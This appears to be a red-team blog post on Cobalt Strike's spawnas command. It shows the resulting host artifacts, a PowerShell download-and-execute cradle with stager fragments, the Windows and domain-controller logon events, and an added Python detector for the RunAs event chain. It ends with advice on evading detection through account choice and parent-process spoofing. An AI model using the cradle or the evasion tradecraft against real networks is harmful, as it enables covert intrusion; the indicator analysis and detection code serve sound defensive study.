beacon> getuid
[*] You are CYBER-LANCE\sgomez

beacon> spawnas cyber-lance\tswift Passw0rd! smb

Files

C:\ProgramData\Microsoft\User Account Pictures\CYBER-LANCE+tswift.dat
C:\Users\tswift\*

Registry

HKU\S-1-5-21-20831996-4275058261-2260353042-1105\*
HKLM\System\CurrentControlSet\Control\Session Manager\Quota System\S-1-5-21-20831996-4275058261-2260353042-1105
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-20831996-4275058261-2260353042-1105\Installer\Assemblies\Global
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-20831996-4275058261-2260353042-1105\Installer\Assemblies\c:|windows|syswow64|windowspowershell|v1.0|powershell.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\SyncCenter\S-1-5-21-20831996-4275058261-2260353042-1105
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-20831996-4275058261-2260353042-1105\*

Processes

Process:  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command:  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
Owner:    CYBER-LANCE\sgomez

    Process:  C:\Windows\system32\conhost.exe
    Command:  \??\C:\Windows\system32\conhost.exe 0x4 
    Owner:    CYBER-LANCE\sgomez

    Process:  c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    Command:  "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    Owner:     CYBER-LANCE\sgomez

        Process:  C:\Windows\system32\conhost.exe
        Command:  \??\C:\Windows\system32\conhost.exe 0x4
        Owner:     CYBER-LANCE\sgomez

        Process:  c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
        Command:  powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADIAMQA1ADQANQAvACcAKQApAA==
        Owner:    CYBER-LANCE\tswift

            Process:  C:\Windows\system32\conhost.exe
            Command:  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Owner:     CYBER-LANCE\tswift

Event Logs

Host
PowerShell
powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIANwAuADAALgAwAC4AMQA6ADIAMQA1ADQANQAvACcAKQApAA==
IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:21545/'))

Set-StrictMode -Version 2
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $var_unsafe_native_methods.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))

Security
Event 4648 - A logon was attempted using explicit credentials.

Subject:
    Security ID:            CYBER-LANCE\sgomez
    Account Name:           sgomez
    Account Domain:         CYBER-LANCE
    Logon ID:               0x1CA1B
    Logon GUID:             {00000000-0000-0000-0000-000000000000}

Account Whose Credentials Were Used:
    Account Name:           tswift
    Account Domain:         CYBER-LANCE
    Logon GUID:             {a843a69f-767e-22b4-8b0f-71cc64803ccd}

Target Server:
    Target Server Name:     localhost
    Additional Information: localhost

Process Information:
    Process ID:             0x39c
    Process Name:           C:\Windows\System32\svchost.exe

Event 4624 - An account was successfully logged on.

Subject:
    Security ID:            CYBER-LANCE\sgomez
    Account Name:           sgomez
    Account Domain:         CYBER-LANCE
    Logon ID:               0x1CA1B

Logon Information:
    Logon Type:             2
    Restricted Admin Mode:  -
    Virtual Account:        No
    Elevated Token:         Yes

Impersonation Level:        Impersonation

New Logon:
    Security ID:            CYBER-LANCE\tswift
    Account Name:           tswift
    Account Domain:         CYBER-LANCE
    Logon ID:               0x996A0
    Linked Logon ID:        0x996BB
    Network Account Name:   -
    Network Account Domain: -
    Logon GUID:             {a843a69f-767e-22b4-8b0f-71cc64803ccd}

Process Information:
    Process ID:             0x39c
    Process Name:           C:\Windows\System32\svchost.exe

Network Information:
    Workstation Name:       DESKTOP-01
    Source Network Address: ::1
    Source Port:            0

Event 4627 - Group membership information.

Subject:
    Security ID:        CYBER-LANCE\sgomez
    Account Name:       sgomez
    Account Domain:     CYBER-LANCE
    Logon ID:           0x1CA1B

Logon Type:             2

New Logon:
    Security ID:        CYBER-LANCE\tswift
    Account Name:       tswift
    Account Domain:     CYBER-LANCE
    Logon ID:           0x996A0

Event 4672 - Special privileges assigned to new logon.

Subject:
    Security ID:        CYBER-LANCE\tswift
    Account Name:       tswift
    Account Domain:     CYBER-LANCE
    Logon ID:           0x996A0

Privileges:             SeSecurityPrivilege
                        SeTakeOwnershipPrivilege
                        SeLoadDriverPrivilege
                        SeBackupPrivilege
                        SeRestorePrivilege
                        SeDebugPrivilege
                        SeSystemEnvironmentPrivilege
                        SeImpersonatePrivilege
                        SeDelegateSessionUserImpersonatePrivilege

DC
Security
Event 4768 - A Kerberos authentication ticket (TGT) was requested.

Account Information:
    Account Name:               tswift
    Supplied Realm Name:        cyber-lance
    User ID:                    CYBER-LANCE\tswift

Service Information:
    Service Name:               krbtgt
    Service ID:                 CYBER-LANCE\krbtgt

Network Information:
    Client Address:             ::ffff:172.16.2.10
    Client Port:                49740

Additional Information:
    Ticket Options:             0x40810010
    Result Code:                0x0
    Ticket Encryption Type:     0x12
    Pre-Authentication Type:    2

Event 4769 - A Kerberos service ticket was requested.

Account Information:
    Account Name:               [email protected]
    Account Domain:             CYBER-LANCE.LOCAL
    Logon GUID:                 {a843a69f-767e-22b4-8b0f-71cc64803ccd}

Service Information:
    Service Name:               DESKTOP-01$
    Service ID:                 CYBER-LANCE\DESKTOP-01$

Network Information:
    Client Address:             ::ffff:172.16.2.10
    Client Port:                49741

Additional Information:
    Ticket Options:             0x40810000
    Ticket Encryption Type:     0x12
    Failure Code:               0x0
    Transited Services:         -

Summary

spawnas is very noisy in terms of host-based indicators: it creates hundreds of user-profile directories and registry entries. I recommend not using it on a machine where the account is unlikely to be in legitimate use. On a workstation, the account of a desktop support engineer may blend in, but something like an MSSQL service account is going to look out of place.

Events 4624, 4627 and 4648 give away that a standard user is explicitly using the credentials of a domain admin (à la RunAs), which is all the more suspicious when the two accounts have completely different names. It may be more effective to reserve this for scenarios where separate user and admin accounts are in use: compromise the workstation belonging to sgomez, then use this function to spawn a new Beacon as sgomez_admin.
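The correlation those events make possible, written up as an added detection example (not part of the original post): it walks constructed records shaped like the 4648, 4624 and 4672 entries above and flags a Subject account that explicitly used a different account's credentials for a local interactive logon which then received admin-level privileges. The field names and the ADMIN_PRIVS set are my own choices for the example, not the Windows event schema.

```python
"""Correlate the host Security events a spawnas-style RunAs leaves behind."""

# Privileges from the 4672 record above that mark a logon as admin-level.
ADMIN_PRIVS = {"SeDebugPrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
               "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege"}

# Constructed records mirroring the page's 4648 / 4624 / 4672 excerpts (trimmed).
EVENTS = [
    {"id": 4648, "subject": "CYBER-LANCE\\sgomez", "target": "CYBER-LANCE\\tswift",
     "guid": "{a843a69f-767e-22b4-8b0f-71cc64803ccd}", "server": "localhost"},
    {"id": 4624, "subject": "CYBER-LANCE\\sgomez", "target": "CYBER-LANCE\\tswift",
     "guid": "{a843a69f-767e-22b4-8b0f-71cc64803ccd}", "logon_type": 2,
     "logon_id": "0x996A0", "src": "::1"},
    {"id": 4672, "target": "CYBER-LANCE\\tswift", "logon_id": "0x996A0",
     "privs": {"SeSecurityPrivilege", "SeDebugPrivilege", "SeImpersonatePrivilege"}},
    # Benign control (constructed): a user re-authenticating as themselves.
    {"id": 4648, "subject": "CYBER-LANCE\\sgomez", "target": "CYBER-LANCE\\sgomez",
     "guid": "{11111111-1111-1111-1111-111111111111}", "server": "localhost"},
    {"id": 4624, "subject": "CYBER-LANCE\\sgomez", "target": "CYBER-LANCE\\sgomez",
     "guid": "{11111111-1111-1111-1111-111111111111}", "logon_type": 2,
     "logon_id": "0x1CA1B", "src": "::1"},
]


def find_runas_to_privileged_account(events):
    """Return (subject, target, logon_id) for each suspicious RunAs chain.

    Chain: 4648 whose Subject differs from the account whose credentials were
    used -> 4624 sharing that Logon GUID, interactive (type 2) from the local
    host -> 4672 for the resulting Logon ID granting an admin-level privilege.
    A lone 4648 is too noisy (scheduled tasks and services running with stored
    credentials also raise it), so all three links are required.
    """
    logon_by_guid = {e["guid"]: e for e in events if e["id"] == 4624}
    privs_by_logon_id = {e["logon_id"]: e["privs"] for e in events if e["id"] == 4672}
    hits = []
    for e in events:
        if e["id"] != 4648 or e["subject"] == e["target"]:
            continue
        logon = logon_by_guid.get(e["guid"])
        if logon is None or logon["logon_type"] != 2:
            continue
        if logon["src"] not in ("::1", "127.0.0.1"):
            continue  # spawnas runs on the host itself; remote RunAs is a separate case
        if privs_by_logon_id.get(logon["logon_id"], set()) & ADMIN_PRIVS:
            hits.append((e["subject"], e["target"], logon["logon_id"]))
    return hits
```

Logon GUID is all zeros on NTLM-only logons, so a production version should fall back to correlating on the target account within a short time window; the DC-side 4768/4769 above for tswift from the workstation's address are the second place to confirm the hit.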

Don’t forget to leverage spawnto and ppid to change the process Beacon launches for its post-exploitation jobs and the parent it runs under. Always do your situational awareness first so that your activity blends in with the target’s normal day-to-day operations.